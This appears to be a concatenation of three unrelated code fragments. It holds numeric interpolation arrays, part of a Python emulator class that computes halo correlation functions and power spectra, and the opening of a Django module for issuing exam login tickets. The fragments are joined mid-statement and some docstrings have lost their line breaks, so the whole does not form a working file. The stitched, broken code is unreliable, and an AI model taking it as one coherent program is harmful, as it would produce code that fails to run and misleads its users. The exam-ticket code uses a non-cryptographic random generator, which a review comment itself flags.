-4.395907252919E+19, -2.541022128832E+18, 3.028233784055E+19, 2.970716794347E+19, 4.276873550626E+19, 5.583030306905E+19, 6.889187063183E+19, 6.276115134204E+19, 5.929572720554E+19, 5.583030306904E+19, 5.236487893254E+19, 5.915017375739E+19, -8.984236486838E+16, -7.891149755669E+19, -1.189597074863E+20, -1.141320477848E+20, -1.101525797349E+20, -1.141320477848E+20, -1.189597074863E+20, -7.891149755669E+19, -8.984236486857E+16, 5.915017375739E+19, 5.236487893254E+19, 5.583030306905E+19, 5.929572720555E+19, 6.276115134206E+19, 5.663043205226E+19, 6.276115134204E+19, 6.889187063182E+19, 7.502258992160E+19, 8.801800967422E+19, 2.361337399095E+18, -1.138639225842E+20, -1.744516071724E+20, -1.684506962764E+20, -1.629840661335E+20, -1.684506962764E+20, -1.744516071724E+20, -1.138639225842E+20, 2.361337399095E+18, 8.801800967422E+19, 7.502258992161E+19, 
6.889187063183E+19, 6.276115134206E+19, 5.663043205228E+19], dtype=np.float64 ) def setup_linear(self): self.precalc_interpolation = np.array( [[7.049456954407E+18, 1.385029207141E+18, -4.488982302467E+18, -8.350115450764E+18, -7.975908114097E+18, -5.651707329729E+18, -4.876973734940E+18, -5.651707329729E+18, -7.975908114097E+18, -8.350115450764E+18, -4.488982302467E+18, 1.385029207141E+18, 7.049456954407E+18], [1.385029207141E+18, -4.879157504269E+18, -4.577658518112E+18, -1.668062692568E+17, 5.897066807427E+18, 7.777865377223E+18, 8.404798233821E+18, 7.777865377223E+18, 5.897066807427E+18, -1.668062692568E+17, -4.577658518112E+18, -4.879157504269E+18, 1.385029207141E+18], [-4.488982302467E+18, -4.577658518112E+18, 8.812770983874E+17, 6.309373814419E+18, 6.128180897374E+18, 2.067539131431E+18, 7.139918761166E+17, 2.067539131431E+18, 6.128180897374E+18, 6.309373814419E+18, 8.812770983874E+17, -4.577658518112E+18, -4.488982302467E+18], [-8.350115450764E+18, -1.668062692568E+17, 6.309373814419E+18, 6.527705442988E+18, -4.062530740828E+18, -9.163192204604E+18, -1.086341269253E+19, -9.163192204604E+18, -4.062530740828E+18, 6.527705442988E+18, 6.309373814419E+18, -1.668062692568E+17, -8.350115450764E+18], [-7.975908114097E+18, 5.897066807427E+18, 6.128180897374E+18, -4.062530740828E+18, -2.145503300375E+19, -1.229483476838E+19, -9.241435356589E+18, -1.229483476838E+19, -2.145503300375E+19, -4.062530740828E+18, 6.128180897374E+18, 5.897066807427E+18, -7.975908114097E+18], [-5.651707329729E+18, 7.777865377223E+18, 2.067539131431E+18, -9.163192204604E+18, -1.229483476838E+19, 3.145654217072E+19, 4.604033448375E+19, 3.145654217072E+19, -1.229483476838E+19, -9.163192204604E+18, 2.067539131431E+18, 7.777865377223E+18, -5.651707329729E+18], [-4.876973734940E+18, 8.404798233821E+18, 7.139918761166E+17, -1.086341269253E+19, -9.241435356589E+18, 4.604033448375E+19, 6.446759109720E+19, 4.604033448375E+19, -9.241435356589E+18, -1.086341269253E+19, 7.139918761166E+17, 
8.404798233821E+18, -4.876973734940E+18], [-5.651707329729E+18, 7.777865377223E+18, 2.067539131431E+18, -9.163192204604E+18, -1.229483476838E+19, 3.145654217072E+19, 4.604033448375E+19, 3.145654217072E+19, -1.229483476838E+19, -9.163192204604E+18, 2.067539131431E+18, 7.777865377223E+18, -5.651707329729E+18], [-7.975908114097E+18, 5.897066807427E+18, 6.128180897374E+18, -4.062530740828E+18, -2.145503300375E+19, -1.229483476838E+19, -9.241435356589E+18, -1.229483476838E+19, -2.145503300375E+19, -4.062530740828E+18, 6.128180897374E+18, 5.897066807427E+18, -7.975908114097E+18], [-8.350115450764E+18, -1.668062692568E+17, 6.309373814419E+18, 6.527705442988E+18, -4.062530740828E+18, -9.163192204604E+18, -1.086341269253E+19, -9.163192204604E+18, -4.062530740828E+18, 6.527705442988E+18, 6.309373814419E+18, -1.668062692568E+17, -8.350115450764E+18], [-4.488982302467E+18, -4.577658518112E+18, 8.812770983874E+17, 6.309373814419E+18, 6.128180897374E+18, 2.067539131431E+18, 7.139918761166E+17, 2.067539131431E+18, 6.128180897374E+18, 6.309373814419E+18, 8.812770983874E+17, -4.577658518112E+18, -4.488982302467E+18], [1.385029207141E+18, -4.879157504269E+18, -4.577658518112E+18, -1.668062692568E+17, 5.897066807427E+18, 7.777865377223E+18, 8.404798233821E+18, 7.777865377223E+18, 5.897066807427E+18, -1.668062692568E+17, -4.577658518112E+18, -4.879157504269E+18, 1.385029207141E+18], [7.049456954407E+18, 1.385029207141E+18, -4.488982302467E+18, -8.350115450764E+18, -7.975908114097E+18, -5.651707329729E+18, -4.876973734940E+18, -5.651707329729E+18, -7.975908114097E+18, -8.350115450764E+18, -4.488982302467E+18, 1.385029207141E+18, 7.049456954407E+18]], dtype=np.float64 ) self.precalc_extrapolation_nearest: np.array = np.array( [7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 1.385029207141E+18, -4.488982302467E+18, -8.350115450764E+18, -7.975908114097E+18, -5.651707329729E+18, -4.876973734940E+18, -5.651707329729E+18, -7.975908114097E+18, 
-8.350115450764E+18, -4.488982302467E+18, 1.385029207141E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 1.385029207141E+18, -4.488982302467E+18, -8.350115450764E+18, -7.975908114097E+18, -5.651707329729E+18, -4.876973734940E+18, -5.651707329729E+18, -7.975908114097E+18, -8.350115450764E+18, -4.488982302467E+18, 1.385029207141E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 1.385029207141E+18, -4.488982302467E+18, -8.350115450764E+18, -7.975908114097E+18, -5.651707329729E+18, -4.876973734940E+18, -5.651707329729E+18, -7.975908114097E+18, -8.350115450764E+18, -4.488982302467E+18, 1.385029207141E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 7.049456954407E+18, 1.385029207141E+18, 1.385029207141E+18, 1.385029207141E+18, 1.385029207141E+18, 1.385029207141E+18, 1.385029207141E+18, -4.488982302467E+18, -4.488982302467E+18, -4.488982302467E+18, -4.488982302467E+18, -4.488982302467E+18, -4.488982302467E+18, -8.350115450764E+18, -8.350115450764E+18, -8.350115450764E+18, -8.350115450764E+18, -8.350115450764E+18, -8.350115450764E+18, -7.975908114097E+18, -7.975908114097E+18, -7.975908114097E+18, -7.975908114097E+18, -7.975908114097E+18, -7.975908114097E+18, -5.651707329729E+18, -5.651707329729E+18, -5.651707329729E+18, -5.651707329729E+18, -5.651707329729E+18, -5.651707329729E+18, -4.876973734940E+18, -4.876973734940E+18, -4.876973734940E+18, -4.876973734940E+18, -4.876973734940E+18, -4.876973734940E+18, -5.651707329729E+18, -5.651707329729E+18, -5.651707329729E+18, -5.651707329729E+18, -5.651707329729E+18, -5.651707329729E+18, -7.975908114097E+18, -7.975908114097E+18,
# NOTE(review): this chunk begins mid-way through `get_xiauto`; the line below is
# the tail of a backslash-continued sum (direct + tree-level terms) whose opening
# line is not visible here.
\ xi_tree * (1-np.exp(-(xs/rswitch)**4))
        elif logdens1 < -5.75 and logdens2 >= -5.75:
            # Only the first sample is below the -5.75 log-density boundary
            # (presumably the edge of the emulator's trained range -- TODO confirm):
            # evaluate the direct term at the boundary and rescale it by the
            # bias ratio of the out-of-range sample.
            xi_dir = self._get_xiauto_direct(
                xs, -5.75, logdens2, redshift) * self.g1.bias_ratio(redshift, logdens1)
            # Switching scale between the direct and tree-level predictions,
            # capped at 60 (units presumably Mpc/h -- TODO confirm).
            rswitch = min(60., 0.5 * self.cosmo.get_BAO_approx())
            # Blend: direct term dominates below rswitch, tree-level above,
            # via an exp(-(x/rswitch)^4) switch.
            xi_tot = xi_dir * np.exp(-(xs/rswitch)**4) + \
                xi_tree * (1-np.exp(-(xs/rswitch)**4))
        else:
            # Both samples below the boundary: rescale by both bias ratios.
            xi_dir = self._get_xiauto_direct(xs, -5.75, -5.75, redshift) * self.g1.bias_ratio(
                redshift, logdens1)*self.g1.bias_ratio(redshift, logdens2)
            rswitch = min(60., 0.5 * self.cosmo.get_BAO_approx())
            xi_tot = xi_dir * np.exp(-(xs/rswitch)**4) + \
                xi_tree * (1-np.exp(-(xs/rswitch)**4))
        # Return an interpolating spline over the blended correlation function.
        return iuspline(xs, xi_tot)

    def get_xiauto_massthreshold(self, xs, Mthre, redshift):
        """get_xiauto_massthreshold

        Compute the halo-halo correlation function,
        :math:`\\xi_\mathrm{hh}(x;>M_\mathrm{th})`, for a mass threshold
        halo sample.

        Args:
            xs (numpy array): Separations in :math:`[h^{-1}\mathrm{Mpc}]`
            Mthre (float): Minimum halo mass threshold in :math:`[h^{-1}M_\odot]`
            redshift (float): Redshift at which the correlation function is evaluated

        Returns:
            numpy array: Halo correlation function
        """
        # Convert the mass threshold to a cumulative number density and
        # delegate to the density-based interface.
        logdens = np.log10(self.mass_to_dens(Mthre, redshift))
        return self.get_xiauto(xs, logdens, logdens, redshift)

    def get_xiauto_mass(self, xs, M1, M2, redshift):
        """get_xiauto_mass

        Compute the halo-halo correlation function,
        :math:`\\xi_\mathrm{hh}(x;M_1,M_2)`, between 2 halo samples with
        mass :math:`M_1` and :math:`M_2`.

        Args:
            xs (numpy array): Separations in :math:`[h^{-1}\mathrm{Mpc}]`
            M1 (float): Halo mass of the first sample in :math:`[h^{-1}M_\odot]`
            M2 (float): Halo mass of the second sample in :math:`[h^{-1}M_\odot]`
            redshift (float): Redshift at which the correlation function is evaluated

        Returns:
            numpy array: Halo correlation function
        """
        # Finite difference in mass (+/-1%) to turn cumulative (threshold)
        # statistics into differential (per-mass) ones.
        M1p = M1 * 1.01
        M1m = M1 * 0.99
        M2p = M2 * 1.01
        M2m = M2 * 0.99
        dens1p = self.mass_to_dens(M1p, redshift)
        dens1m = self.mass_to_dens(M1m, redshift)
        dens2p = self.mass_to_dens(M2p, redshift)
        dens2m = self.mass_to_dens(M2m, redshift)
        logdens1p, logdens1m, logdens2p, logdens2m = np.log10(
            dens1p), np.log10(dens1m), np.log10(dens2p), np.log10(dens2m)
        ximm = self.get_xiauto(xs, logdens1m, logdens2m, redshift)
        ximp = self.get_xiauto(xs, logdens1m, logdens2p, redshift)
        xipm = self.get_xiauto(xs, logdens1p, logdens2m, redshift)
        xipp = self.get_xiauto(xs, logdens1p, logdens2p, redshift)
        # Number-density-weighted double difference of the threshold
        # correlation functions.
        numer = ximm * dens1m * dens2m - ximp * dens1m * dens2p - \
            xipm * dens1p * dens2m + xipp * dens1p * dens2p
        denom = dens1m * dens2m - dens1m * dens2p - dens1p * dens2m + dens1p * dens2p
        return numer / denom

    def _get_phh_tree(self, ks, logdens1, logdens2, redshift):
        # Tree-level halo power spectrum: g1 * g2 * P_lin(k).
        g1 = self.g1.get(ks, redshift, logdens1)
        g2 = self.g1.get(ks, redshift, logdens2)
        pm_lin = self.get_pklin(ks)
        ph_tree = g1 * g2 * pm_lin
        return ph_tree

    def _get_phh_direct(self, ks, logdens1, logdens2, redshift):
        # Fourier transform of the directly-emulated correlation function,
        # via FFTLog on a fixed log-spaced grid.
        xs = np.logspace(-3, 3, 4000)
        xihh = self.xi_auto.get(xs, redshift, logdens1, logdens2)
        return pyfftlog_interface.xi2pk_pyfftlog(iuspline(xs, xihh))(ks)

    def get_phh(self, ks, logdens1, logdens2, redshift):
        """get_phh

        Compute the halo-halo power spectrum :math:`P_{hh}(k;n_1,n_2)`
        between 2 mass threshold halo samples specified by the corresponding
        cumulative number densities.

        Args:
            ks (numpy array): Wavenumbers in :math:`[h\mathrm{Mpc}^{-1}]`
            logdens1 (float): Logarithm of the cumulative halo number density
                of the first halo sample taken from the most massive,
                :math:`\log_{10}[n_1/(h^{-1}\mathrm{Mpc})^3]`
            logdens2 (float): Logarithm of the cumulative halo number density
                of the second halo sample taken from the most massive,
                :math:`\log_{10}[n_2/(h^{-1}\mathrm{Mpc})^3]`
            redshift (float): redshift at which the power spectrum is evaluated

        Returns:
            numpy array: halo power spectrum in :math:`[(h^{-1}\mathrm{Mpc})^{3}]`
        """
        # Same direct/tree-level blending as get_xiauto, done in configuration
        # space, then transformed to Fourier space with FFTLog.
        xs = np.logspace(-3, 3, 4000)
        xi_tree = self._get_xiauto_tree(xs, logdens1, logdens2, redshift)
        rswitch = min(60., 0.5 * self.cosmo.get_BAO_approx())
        if logdens1 >= -5.75 and logdens2 >= -5.75:
            # Both samples inside the -5.75 boundary: use the direct term as-is.
            xi_dir = self._get_xiauto_direct(xs, logdens1, logdens2, redshift)
            xi_tot = xi_dir * np.exp(-(xs/rswitch)**4) + xi_tree * (1-np.exp(-(xs/rswitch)**4))
        elif logdens1 >= -5.75 and logdens2 < -5.75:
            # Second sample out of range: evaluate at the boundary, rescale by its bias ratio.
            xi_dir = self._get_xiauto_direct(xs, logdens1, -5.75, redshift) * self.g1.bias_ratio(redshift, logdens2)
            xi_tot = xi_dir * np.exp(-(xs/rswitch)**4) + xi_tree * (1-np.exp(-(xs/rswitch)**4))
        elif logdens1 < -5.75 and logdens2 >= -5.75:
            # First sample out of range: symmetric case.
            xi_dir = self._get_xiauto_direct(xs, -5.75, logdens2, redshift) * self.g1.bias_ratio(redshift, logdens1)
            xi_tot = xi_dir * np.exp(-(xs/rswitch)**4) + xi_tree * (1-np.exp(-(xs/rswitch)**4))
        else:
            # Both samples out of range: rescale by both bias ratios.
            xi_dir = self._get_xiauto_direct(xs, -5.75, -5.75, redshift) * self.g1.bias_ratio(redshift, logdens1)*self.g1.bias_ratio(redshift, logdens2)
            xi_tot = xi_dir * np.exp(-(xs/rswitch)**4) + xi_tree * (1-np.exp(-(xs/rswitch)**4))
        return pyfftlog_interface.xi2pk_pyfftlog(iuspline(xs, xi_tot))(ks)

    def _get_phh_tree_cut(self, ks, logdens1, logdens2, redshift):
        # Tree-level-only piece of get_phh (direct term suppressed by the switch).
        xs = np.logspace(-3, 3, 4000)
        xi_tree = self._get_xiauto_tree(xs, logdens1, logdens2, redshift)
        rswitch = min(60., 0.5 * self.cosmo.get_BAO_approx())
        xi_tot = xi_tree * (1-np.exp(-(xs/rswitch)**4))
        return pyfftlog_interface.xi2pk_pyfftlog(iuspline(xs, xi_tot))(ks)

    def _get_phh_direct_cut(self, ks, logdens1, logdens2, redshift):
        # Direct-emulator-only piece of get_phh (tree-level term suppressed);
        # branch logic mirrors get_phh.
        xs = np.logspace(-3, 3, 4000)
        rswitch = min(60., 0.5 * self.cosmo.get_BAO_approx())
        if logdens1 >= -5.75 and logdens2 >= -5.75:
            xi_dir = self._get_xiauto_direct(xs, logdens1, logdens2, redshift)
            xi_tot = xi_dir * np.exp(-(xs/rswitch)**4)
        elif logdens1 >= -5.75 and logdens2 < -5.75:
            xi_dir = self._get_xiauto_direct(xs, logdens1, -5.75, redshift) * self.g1.bias_ratio(redshift, logdens2)
            xi_tot = xi_dir * np.exp(-(xs/rswitch)**4)
        elif logdens1 < -5.75 and logdens2 >= -5.75:
            xi_dir = self._get_xiauto_direct(xs, -5.75, logdens2, redshift) * self.g1.bias_ratio(redshift, logdens1)
            xi_tot = xi_dir * np.exp(-(xs/rswitch)**4)
        else:
            xi_dir = self._get_xiauto_direct(xs, -5.75, -5.75, redshift) * self.g1.bias_ratio(redshift, logdens1)*self.g1.bias_ratio(redshift, logdens2)
            xi_tot = xi_dir * np.exp(-(xs/rswitch)**4)
        return pyfftlog_interface.xi2pk_pyfftlog(iuspline(xs, xi_tot))(ks)

    def get_phh_massthreshold(self, ks, Mthre, redshift):
        """get_phh_massthreshold

        Compute the halo-halo auto power spectrum
        :math:`P_{hh}(k;>M_\mathrm{th})` for a mass threshold halo sample.

        Args:
            ks (numpy array): Wavenumbers in :math:`[h\mathrm{Mpc}^{-1}]`
            Mthre (float): Minimum halo mass threshold in :math:`[h^{-1}M_\odot]`
            redshift (float): redshift at which the power spectrum is evaluated

        Returns:
            numpy array: halo power spectrum in :math:`[(h^{-1}\mathrm{Mpc})^{3}]`
        """
        # Mass threshold -> cumulative number density, then delegate.
        logdens = np.log10(self.mass_to_dens(Mthre, redshift))
        return self.get_phh(ks, logdens, logdens, redshift)

    def get_phh_mass(self, ks, M1, M2, redshift):
        """get_phh_mass

        Compute the halo-halo power spectrum :math:`P_{hh}(k;M_1,M_2)`
        between 2 halo samples with mass :math:`M_1` and :math:`M_2`.
Args: ks (numpy array): Wavenumbers in :math:`[h\mathrm{Mpc}^{-1}]` M1 (float): Halo mass of the first sample in :math:`[h^{-1}M_\odot]` M2 (float): Halo mass of the second sample in :math:`[h^{-1}M_\odot]` redshift (float): redshift at which the power spectrum is evaluated Returns: numpy array: halo power spectrum in :math:`[(h^{-1}\mathrm{Mpc})^{3}]` """ M1p = M1 * 1.01 M1m = M1 * 0.99 M2p = M2 * 1.01 M2m = M2 * 0.99 dens1p = self.mass_to_dens(M1p,redshift) dens1m = self.mass_to_dens(M1m,redshift) dens2p = self.mass_to_dens(M2p,redshift) dens2m = self.mass_to_dens(M2m,redshift) logdens1p, logdens1m, logdens2p, logdens2m = np.log10(dens1p), np.log10(dens1m), np.log10(dens2p), np.log10(dens2m) pmm = self.get_phh(ks,logdens1m,logdens2m,redshift) pmp = self.get_phh(ks,logdens1m,logdens2p,redshift) ppm = self.get_phh(ks,logdens1p,logdens2m,redshift) ppp = self.get_phh(ks,logdens1p,logdens2p,redshift) numer = pmm * dens1m * dens2m - pmp * dens1m * dens2p - ppm * dens1p * dens2m + ppp * dens1p * dens2p denom = dens1m * dens2m - dens1m * dens2p - dens1p * dens2m + dens1p * dens2p return numer / denom def get_wauto(self, R2d, logdens1, logdens2, redshift): """get_wauto Compute the projected halo-halo correlation function :math:`w_{hh}(R;n_1,n_2)` for 2 mass threshold halo samples specified by the corresponding cumulative number densities. 
Args: R2d (numpy array): 2 dimensional projected separation in :math:`[h^{-1}\mathrm{Mpc}]` logdens1 (float): Logarithm of the cumulative halo number density of the first halo sample taken from the most massive, :math:`\log_{10}[n_1/(h^{-1}\mathrm{Mpc})^3]` logdens2 (float): Logarithm of the cumulative halo number density of the second halo sample taken from the most massive, :math:`\log_{10}[n_2/(h^{-1}\mathrm{Mpc})^3]` redshift (float): redshift at which the power spectrum is evaluated Returns: numpy array: projected halo correlation function in :math:`[h^{-1}\mathrm{Mpc}]` """ xs = np.logspace(-3, 3, 1000) xi_auto = self.get_xiauto(xs, logdens1, logdens2, redshift) pk_spl = pyfftlog_interface.xi2pk_pyfftlog(iuspline(xs, xi_auto)) return pyfftlog_interface.pk2xiproj_J0_pyfftlog(pk_spl, logkmin=-3.0, logkmax=3.0)(R2d) def get_wauto_cut(self, R2d, logdens1, logdens2, redshift, pimax, integration="quad"): """get_wauto_cut Compute the projected halo-halo correlation function :math:`w_{hh}(R;n_1,n_2)` for 2 mass threshold halo samples specified by the corresponding cumulative number densities. Unlike get_wauto, this function considers a finite width for the radial integration, from :math:`-\pi_\mathrm{max}` to :math:`\pi_\mathrm{max}`. 
Args: R2d (numpy array): 2 dimensional projected separation in :math:`[h^{-1}\mathrm{Mpc}]` logdens1 (float): Logarithm of the cumulative halo number density of the first halo sample taken from the most massive, :math:`\log_{10}[n_1/(h^{-1}\mathrm{Mpc})^3]` logdens2 (float): Logarithm of the cumulative halo number density of the second halo sample taken from the most massive, :math:`\log_{10}[n_2/(h^{-1}\mathrm{Mpc})^3]` redshift (float): redshift at which the power spectrum is evaluated pimax (float): :math:`\pi_\mathrm{max}` for the upper limit of the integral Returns: numpy array: projected halo correlation function in :math:`[h^{-1}\mathrm{Mpc}]` """ xi3d = self._get_xiauto_spl(logdens1, logdens2, redshift) wauto = [] if integration == "quad": for R2dnow in R2d: wauto.append( 2*integrate.quad(lambda t: xi3d(np.sqrt(t**2+R2dnow**2)), 0, pimax, epsabs=1e-4)[0]) elif integration == "trapz": t = np.linspace(0, pimax, 1024) dt = t[1]-t[0] for R2dnow in R2d: wauto.append( 2*integrate.trapz(xi3d(np.sqrt(t**2+R2dnow**2)), dx=dt)) else: raise RuntimeError( "You should specify valid integration algorithm: quad or trapz") return np.array(wauto) def get_wauto_massthreshold(self, R2d, Mthre, redshift): """get_wauto_massthreshold Compute the projected halo-halo correlation function :math:`w_{hh}(R;>M_\mathrm{th})` for a mass threshold halo sample. 
Args: R2d (numpy array): 2 dimensional projected separation in :math:`[h^{-1}\mathrm{Mpc}]` Mthre (float): Minimum halo mass threshold in :math:`[h^{-1}M_\odot]` redshift (float): redshift at which the power spectrum is evaluated Returns: numpy array: projected halo correlation function in :math:`[h^{-1}\mathrm{Mpc}]` """ logdens = np.log10(self.mass_to_dens(Mthre, redshift)) return self.get_wauto(R2d, logdens, logdens, redshift) def get_wauto_masthreshold_cut(self, R2d, Mthre, redshift, pimax, integration="quad"): """get_wauto_massthreshold_cut Compute the projected halo-halo correlation function :math:`w_{hh}(R;>M_\mathrm{th})` for a mass threshold halo sample. Unlike get_wauto_massthreshold, this function considers a finite width for the radial integration, from :math:`-\pi_\mathrm{max}` to :math:`\pi_\mathrm{max}`. Args: R2d (numpy array): 2 dimensional projected separation in :math:`[h^{-1}\mathrm{Mpc}]` Mthre (float): Minimum halo mass threshold in :math:`[h^{-1}M_\odot]` redshift (float): redshift at which the power spectrum is evaluated pimax (float): :math:`\pi_\mathrm{max}` for the upper limit of the integral Returns: numpy array: projected halo correlation function in
<gh_stars>0
# -*- coding: utf-8 -*-

from __future__ import division

__copyright__ = "Copyright (C) 2015 <NAME>"

__license__ = """ Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 
"""

from django.contrib.auth import get_user_model
import django.forms as forms
from django.utils.translation import (
        ugettext, ugettext_lazy as _, pgettext)
from django.shortcuts import (  # noqa
        render, get_object_or_404, redirect)
from django.core.exceptions import (  # noqa
        PermissionDenied, ObjectDoesNotExist, SuspiciousOperation)
from django.contrib import messages  # noqa
from django.contrib.auth.decorators import permission_required
from django import http  # noqa
from django.db import transaction
from django.db.models import Q
from django.urls import reverse
from django.views.decorators.debug import sensitive_post_parameters
from django.views.decorators.cache import never_cache
from django.views.decorators.csrf import csrf_protect

from crispy_forms.layout import Submit
from bootstrap3_datetime.widgets import DateTimePicker

from course.models import (Exam, ExamTicket, Participation, FlowSession)
from course.utils import course_view, render_course_page
from course.constants import (
        exam_ticket_states, participation_status,
        participation_permission as pperm)
from relate.utils import StyledForm, string_concat

# {{{ mypy

if False:
    # Imports needed only for type comments; never executed at runtime.
    import datetime  # noqa
    from typing import Optional, Text, Tuple, FrozenSet  # noqa

# }}}

# Alphabet for ticket codes. Visually confusable characters (0/O, 1/I/l, ...)
# are deliberately absent -- do not "complete" it.
ticket_alphabet = "ABCDEFGHJKLPQRSTUVWXYZabcdefghjkpqrstuvwxyz23456789"


def gen_ticket_code():
    # type: () -> str
    """Return a random 8-character exam ticket code drawn from
    ``ticket_alphabet``.

    NOTE(review): ``random.choice`` is not cryptographically secure; for
    login-gating codes ``secrets.choice`` would be preferable -- confirm
    the intended threat model before changing.
    """
    from random import choice
    return "".join(choice(ticket_alphabet) for i in range(8))


# {{{ issue ticket

class IssueTicketForm(StyledForm):
    """Form for issuing a single exam ticket to one participant."""

    def __init__(self, now_datetime, *args, **kwargs):
        initial_exam = kwargs.pop("initial_exam", None)

        super(IssueTicketForm, self).__init__(*args, **kwargs)

        # Imported here (not at module level) -- presumably to avoid an
        # import cycle with course.auth; verify before hoisting.
        from course.auth import UserSearchWidget

        self.fields["user"] = forms.ModelChoiceField(
                queryset=(get_user_model().objects
                    .filter(is_active=True)
                    .order_by("last_name")),
                widget=UserSearchWidget(),
                required=True,
                help_text=_("Select participant for whom ticket is to "
                    "be issued."),
                label=_("Participant"))
        self.fields["exam"] = forms.ModelChoiceField(
                queryset=(
Exam.objects
                    # Only active exams whose sign-up window has not closed.
                    .filter(
                        Q(active=True)
                        & (
                            Q(no_exams_after__isnull=True)
                            | Q(no_exams_after__gt=now_datetime)
                            ))
                    .order_by("no_exams_before")
                    ),
                required=True,
                initial=initial_exam,
                label=_("Exam"))
        self.fields["valid_start_time"] = forms.DateTimeField(
                label=_("Start validity"),
                widget=DateTimePicker(
                    options={"format": "YYYY-MM-DD HH:mm", "sideBySide": True}),
                required=False)
        self.fields["valid_end_time"] = forms.DateTimeField(
                label=_("End validity"),
                widget=DateTimePicker(
                    options={"format": "YYYY-MM-DD HH:mm", "sideBySide": True}),
                required=False)
        self.fields["restrict_to_facility"] = forms.CharField(
                label=_("Restrict to facility"),
                help_text=_("If not blank, the exam ticket may only be used in the "
                    "given facility"),
                required=False)
        self.fields["revoke_prior"] = forms.BooleanField(
                label=_("Revoke prior exam tickets for this user"),
                required=False,
                initial=True)

        self.helper.add_input(
                Submit(
                    "issue", _("Issue ticket")))


@permission_required("course.can_issue_exam_tickets", raise_exception=True)
def issue_exam_ticket(request):
    """View: issue a single exam ticket to a participant.

    On GET, render an empty :class:`IssueTicketForm`; on valid POST, create
    an :class:`ExamTicket` (optionally revoking the user's prior tickets for
    the same exam) and re-render the form pre-set to the same exam.
    """
    # must import locally for mock to work
    from course.views import get_now_or_fake_time
    now_datetime = get_now_or_fake_time(request)

    if request.method == "POST":
        form = IssueTicketForm(now_datetime, request.POST)
        if form.is_valid():
            exam = form.cleaned_data["exam"]
            try:
                participation = Participation.objects.get(
                            course=exam.course,
                            user=form.cleaned_data["user"],
                            status=participation_status.active,
                            )
            except ObjectDoesNotExist:
                messages.add_message(request, messages.ERROR,
                        _("User is not enrolled in course."))
                participation = None

            if participation is not None:
                if form.cleaned_data["revoke_prior"]:
                    # Mark still-usable tickets (valid or used) as revoked so
                    # only the newly-issued one remains.
                    ExamTicket.objects.filter(
                            exam=exam,
                            participation=participation,
                            state__in=(
                                exam_ticket_states.valid,
                                exam_ticket_states.used,
                                )
                            ).update(state=exam_ticket_states.revoked)

                ticket = ExamTicket()
                ticket.exam = exam
                ticket.participation = participation
                ticket.creator = request.user
                ticket.state = exam_ticket_states.valid
                ticket.code = gen_ticket_code()
                ticket.valid_start_time = form.cleaned_data["valid_start_time"]
                ticket.valid_end_time = form.cleaned_data["valid_end_time"]
                ticket.restrict_to_facility = \
                        form.cleaned_data["restrict_to_facility"]
                ticket.save()

                messages.add_message(request, messages.SUCCESS,
                        _(
                            "Ticket issued for <b>%(participation)s</b>. "
                            "The ticket code is <b>%(ticket_code)s</b>."
                            )
                        % {"participation": participation,
                            "ticket_code": ticket.code})

                # Reset the form, keeping the exam preselected for the next issue.
                form = IssueTicketForm(now_datetime, initial_exam=exam)
    else:
        form = IssueTicketForm(now_datetime)

    return render(request, "generic-form.html", {
        "form_description": _("Issue Exam Ticket"),
        "form": form,
    })

# }}}


# {{{ batch-issue tickets

# Default template for batch-issued ticket sheets (rendered per ticket).
# NOTE(review): internal newlines of this template were lost in extraction;
# string contents below are reproduced as found. The literal is truncated at
# the end of this chunk and continues past it.
INITIAL_EXAM_TICKET_TEMPLATE = string_concat("""\ # """, _("List"), """ <table class="table"> <thead> <tr> <th>""",
        _("User"), "</th><th>",
        pgettext("real name of a user", "Name"), "</th><th>",
        pgettext("ticket code required to login exam", "Code"),
        """</th> </tr> </thead> {% for ticket in tickets %} <tr> <td> {{ ticket.participation.user.username }} </td> <td> {{ ticket.participation.user.get_full_name }} </td> <td> {{ ticket.code }} </td> </tr> {% endfor %} </table> ---------------- {% for ticket in tickets %} <h2 style="page-break-before: always">""",
        _("Instructions for "  # noqa
            "{{ ticket.exam.description }}"),
        """ </h2> """,
        _("These are personalized instructions for "
            "{{ ticket.participation.user.get_full_name }}."),
        """ """,
        _("If this is not you, please let the proctor know "
            "so that you can get the correct set of instructions."),
        """ """,
        _("Please sit down at your workstation and open a "
            "browser at this location:"),
        """ """,
        _("Exam URL"), """: **`{{ checkin_uri }}`** """,
        _("You should see boxes prompting for your user "
            "name and a one-time check-in code."),
        """ """,
        _("Enter the following information"), ":", """ """,
        _("User name"), """: **`{{ ticket.participation.user.username }}`** """,
        pgettext("ticket code required to login exam", "Code"),
        """: **`{{ ticket.code }}`** """, _("You 
